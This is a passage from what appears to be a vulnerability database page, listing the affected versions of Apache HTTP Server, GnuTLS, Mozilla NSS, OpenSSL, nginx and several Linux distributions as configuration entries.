- Apache>>Http_server >> Version 2.0.18 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.19 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.20 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.21 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.22 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.23 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.24 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.25 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.26 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.27 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.28 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.28 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.29 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.30 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.31 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.32 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.32 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.33 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.34 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.34 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.35 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.36 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.37 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.38 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.39 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.40 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.41 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.42 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.43 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.44 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.45 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.46 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.47 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.48 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.49 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.50 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.51 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.52 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.53 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.54 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.55 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.56 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.57 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.58 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.59 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.60 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.61 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.62 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.63 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.64 (Open CPE detail)
- Apache>>Http_server >> Version 2.0.65 (Open CPE detail)
- Apache>>Http_server >> Version 2.1 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.0 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.1 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.2 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.3 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.4 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.5 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.6 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.7 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.8 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.9 (Open CPE detail)
- Apache>>Http_server >> Version 2.1.10 (Open CPE detail)
- Apache>>Http_server >> Version 2.2 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.0 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.1 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.2 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.3 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.4 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.5 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.6 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.7 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.8 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.9 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.10 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.11 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.12 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.13 (Open CPE detail)
- Apache>>Http_server >> Version 2.2.14 (Open CPE detail)
Gnu>>Gnutls >> Version To (including) 2.8.5
- Gnu>>Gnutls >> Version - (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.16 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.17 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.18 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.19 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.20 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.21 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.22 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.23 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.24 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.0.25 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.13 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.14 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.15 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.16 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.17 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.18 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.19 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.20 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.21 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.22 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.1.23 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.6 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.7 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.8 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.8.1a1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.9 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.10 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.2.11 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.3.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.3.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.3.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.3.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.3.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.3.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.4.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.4.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.4.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.4.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.4.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.4.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.5.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.5.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.5.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.5.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.5.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.5.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.6.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.6.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.6.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.6.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.6 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.7 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.8 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.9 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.10 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.11 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.12 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.13 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.14 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.15 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.16 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.17 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.18 (Open CPE detail)
- Gnu>>Gnutls >> Version 1.7.19 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.0.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.0.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.0.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.0.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.0.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.6 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.7 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.1.8 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.2.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.2.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.2.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.2.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.2.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.2.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.6 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.7 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.8 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.9 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.10 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.3.11 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.4.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.4.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.4.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.4.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.5.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.6.6 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.5 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.7.6 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.8.0 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.8.1 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.8.2 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.8.3 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.8.4 (Open CPE detail)
- Gnu>>Gnutls >> Version 2.8.5 (Open CPE detail)
Mozilla>>Nss >> Version To (including) 3.12.4
- Mozilla>>Nss >> Version - (Open CPE detail)
- Mozilla>>Nss >> Version 3.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.1.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.2.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.3 (Open CPE detail)
- Mozilla>>Nss >> Version 3.3.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.3.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.4 (Open CPE detail)
- Mozilla>>Nss >> Version 3.4.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.4.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.4.3 (Open CPE detail)
- Mozilla>>Nss >> Version 3.6 (Open CPE detail)
- Mozilla>>Nss >> Version 3.6.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.7 (Open CPE detail)
- Mozilla>>Nss >> Version 3.7.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.7.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.7.3 (Open CPE detail)
- Mozilla>>Nss >> Version 3.7.5 (Open CPE detail)
- Mozilla>>Nss >> Version 3.7.7 (Open CPE detail)
- Mozilla>>Nss >> Version 3.8 (Open CPE detail)
- Mozilla>>Nss >> Version 3.9 (Open CPE detail)
- Mozilla>>Nss >> Version 3.9.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.9.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.9.3 (Open CPE detail)
- Mozilla>>Nss >> Version 3.9.4 (Open CPE detail)
- Mozilla>>Nss >> Version 3.9.5 (Open CPE detail)
- Mozilla>>Nss >> Version 3.10 (Open CPE detail)
- Mozilla>>Nss >> Version 3.10.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.10.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.3 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.4 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.5 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.6 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.7 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.8 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.9 (Open CPE detail)
- Mozilla>>Nss >> Version 3.11.10 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12.3 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12.3.1 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12.3.2 (Open CPE detail)
- Mozilla>>Nss >> Version 3.12.4 (Open CPE detail)
Openssl>>Openssl >> Version To (including) 0.9.8k
- Openssl>>Openssl >> Version - (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.1c (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.2b (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.3 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.3 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.3 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.3 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.3a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.4 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.5a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6b (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6c (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6d (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6d (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6d (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6e (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6f (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6g (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6h (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6i (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6j (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6k (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6l (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.6m (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7b (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7c (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7d (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7e (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7f (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7g (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7h (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7i (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7j (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7k (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7l (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.7m (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8a (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8b (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8c (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8c-1 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8d (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8e (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8f (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8g (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8g-9 (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8h (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8i (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8j (Open CPE detail)
- Openssl>>Openssl >> Version 0.9.8k (Open CPE detail)
Openssl>>Openssl >> Version 1.0
Configuraton 0
Canonical>>Ubuntu_linux >> Version 8.04
- Canonical>>Ubuntu_linux >> Version 8.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 8.10
- Canonical>>Ubuntu_linux >> Version 8.10 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 9.04
- Canonical>>Ubuntu_linux >> Version 9.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 9.10
- Canonical>>Ubuntu_linux >> Version 9.10 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 10.04
- Canonical>>Ubuntu_linux >> Version 10.04 (Open CPE detail)
Canonical>>Ubuntu_linux >> Version 10.10
- Canonical>>Ubuntu_linux >> Version 10.10 (Open CPE detail)
Debian>>Debian_linux >> Version 4.0
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
- Debian>>Debian_linux >> Version 4.0 (Open CPE detail)
Debian>>Debian_linux >> Version 5.0
- Debian>>Debian_linux >> Version 5.0 (Open CPE detail)
Debian>>Debian_linux >> Version 6.0
- Debian>>Debian_linux >> Version 6.0 (Open CPE detail)
Debian>>Debian_linux >> Version 7.0
- Debian>>Debian_linux >> Version 7.0 (Open CPE detail)
Debian>>Debian_linux >> Version 8.0
- Debian>>Debian_linux >> Version 8.0 (Open CPE detail)
Fedoraproject>>Fedora >> Version 11
- Fedoraproject>>Fedora >> Version 11 (Open CPE detail)
Fedoraproject>>Fedora >> Version 12
- Fedoraproject>>Fedora >> Version 12 (Open CPE detail)
Fedoraproject>>Fedora >> Version 13
- Fedoraproject>>Fedora >> Version 13 (Open CPE detail)
Fedoraproject>>Fedora >> Version 14
- Fedoraproject>>Fedora >> Version 14 (Open CPE detail)
Configuraton 0
F5>>Nginx >> Version From (including) 0.1.0 To (including) 0.8.22
- F5>>Nginx >> Version 0.1.0 (Open CPE detail)
- F5>>Nginx >> Version 0.1.1 (Open CPE detail)
- F5>>Nginx >> Version 0.1.2 (Open CPE detail)
- F5>>Nginx >> Version 0.1.3 (Open CPE detail)
- F5>>Nginx >> Version 0.1.4 (Open CPE detail)
- F5>>Nginx >> Version 0.1.5 (Open CPE detail)
- F5>>Nginx >> Version 0.1.6 (Open CPE detail)
- F5>>Nginx >> Version 0.1.7 (Open CPE detail)
- F5>>Nginx >> Version 0.1.8 (Open CPE detail)
- F5>>Nginx >> Version 0.1.9 (Open CPE detail)
- F5>>Nginx >> Version 0.1.10 (Open CPE detail)
- F5>>Nginx >> Version 0.1.11 (Open CPE detail)
- F5>>Nginx >> Version 0.1.12 (Open CPE detail)
- F5>>Nginx >> Version 0.1.13 (Open CPE detail)
- F5>>Nginx >> Version 0.1.14 (Open CPE detail)
- F5>>Nginx >> Version 0.1.15 (Open CPE detail)
- F5>>Nginx >> Version 0.1.16 (Open CPE detail)
- F5>>Nginx >> Version 0.1.17 (Open CPE detail)
- F5>>Nginx >> Version 0.1.18 (Open CPE detail)
- F5>>Nginx >> Version 0.1.19 (Open CPE detail)
- F5>>Nginx >> Version 0.1.20 (Open CPE detail)
- F5>>Nginx >> Version 0.1.21 (Open CPE detail)
- F5>>Nginx >> Version 0.1.22 (Open CPE detail)
- F5>>Nginx >> Version 0.1.23 (Open CPE detail)
- F5>>Nginx >> Version 0.1.24 (Open CPE detail)
- F5>>Nginx >> Version 0.1.25 (Open CPE detail)
- F5>>Nginx >> Version 0.1.26 (Open CPE detail)
- F5>>Nginx >> Version 0.1.27 (Open CPE detail)
- F5>>Nginx >> Version 0.1.28 (Open CPE detail)
- F5>>Nginx >> Version 0.1.29 (Open CPE detail)
- F5>>Nginx >> Version 0.1.30 (Open CPE detail)
- F5>>Nginx >> Version 0.1.31 (Open CPE detail)
- F5>>Nginx >> Version 0.1.32 (Open CPE detail)
- F5>>Nginx >> Version 0.1.33 (Open CPE detail)
- F5>>Nginx >> Version 0.1.34 (Open CPE detail)
- F5>>Nginx >> Version 0.1.35 (Open CPE detail)
- F5>>Nginx >> Version 0.1.36 (Open CPE detail)
- F5>>Nginx >> Version 0.1.37 (Open CPE detail)
- F5>>Nginx >> Version 0.1.38 (Open CPE detail)
- F5>>Nginx >> Version 0.1.39 (Open CPE detail)
- F5>>Nginx >> Version 0.1.40 (Open CPE detail)
- F5>>Nginx >> Version 0.1.41 (Open CPE detail)
- F5>>Nginx >> Version 0.1.42 (Open CPE detail)
- F5>>Nginx >> Version 0.1.43 (Open CPE detail)
- F5>>Nginx >> Version 0.1.44 (Open CPE detail)
- F5>>Nginx >> Version 0.1.45 (Open CPE detail)
- F5>>Nginx >> Version 0.2.0 (Open CPE detail)
- F5>>Nginx >> Version 0.2.1 (Open CPE detail)
- F5>>Nginx >> Version 0.2.2 (Open CPE detail)
- F5>>Nginx >> Version 0.2.3 (Open CPE detail)
- F5>>Nginx >> Version 0.2.4 (Open CPE detail)
- F5>>Nginx >> Version 0.2.5 (Open CPE detail)
- F5>>Nginx >> Version 0.2.6 (Open CPE detail)
- F5>>Nginx >> Version 0.3.0 (Open CPE detail)
- F5>>Nginx >> Version 0.3.1 (Open CPE detail)
- F5>>Nginx >> Version 0.3.2 (Open CPE detail)
- F5>>Nginx >> Version 0.3.3 (Open CPE detail)
- F5>>Nginx >> Version 0.3.4 (Open CPE detail)
- F5>>Nginx >> Version 0.3.5 (Open CPE detail)
- F5>>Nginx >> Version 0.3.6 (Open CPE detail)
- F5>>Nginx >> Version 0.3.7 (Open CPE detail)
- F5>>Nginx >> Version 0.3.8 (Open CPE detail)
- F5>>Nginx >> Version 0.3.9 (Open CPE detail)
- F5>>Nginx >> Version 0.3.10 (Open CPE detail)
- F5>>Nginx >> Version 0.3.11 (Open CPE detail)
- F5>>Nginx >> Version 0.3.12 (Open CPE detail)
- F5>>Nginx >> Version 0.3.13 (Open CPE detail)
- F5>>Nginx >> Version 0.3.14 (Open CPE detail)
- F5>>Nginx >> Version 0.3.15 (Open CPE detail)
- F5>>Nginx >> Version 0.3.16 (Open CPE detail)
- F5>>Nginx >> Version 0.3.17 (Open CPE detail)
- F5>>Nginx >> Version 0.3.18 (Open CPE detail)
- F5>>Nginx >> Version 0.3.19 (Open CPE detail)
- F5>>Nginx >> Version 0.3.20 (Open CPE detail)
- F5>>Nginx >> Version 0.3.21 (Open CPE detail)
- F5>>Nginx >> Version 0.3.22 (Open CPE detail)
- F5>>Nginx >> Version 0.3.23 (Open CPE detail)
- F5>>Nginx >> Version 0.3.24 (Open CPE detail)
- F5>>Nginx >> Version 0.3.25 (Open CPE detail)
- F5>>Nginx >> Version 0.3.26 (Open CPE detail)
- F5>>Nginx >> Version 0.3.27 (Open CPE detail)
- F5>>Nginx >> Version 0.3.28 (Open CPE detail)
- F5>>Nginx >> Version 0.3.29 (Open CPE detail)
- F5>>Nginx >> Version 0.3.30 (Open CPE detail)
- F5>>Nginx >> Version 0.3.31 (Open CPE detail)
- F5>>Nginx >> Version 0.3.32 (Open CPE detail)
- F5>>Nginx >> Version 0.3.33 (Open CPE detail)
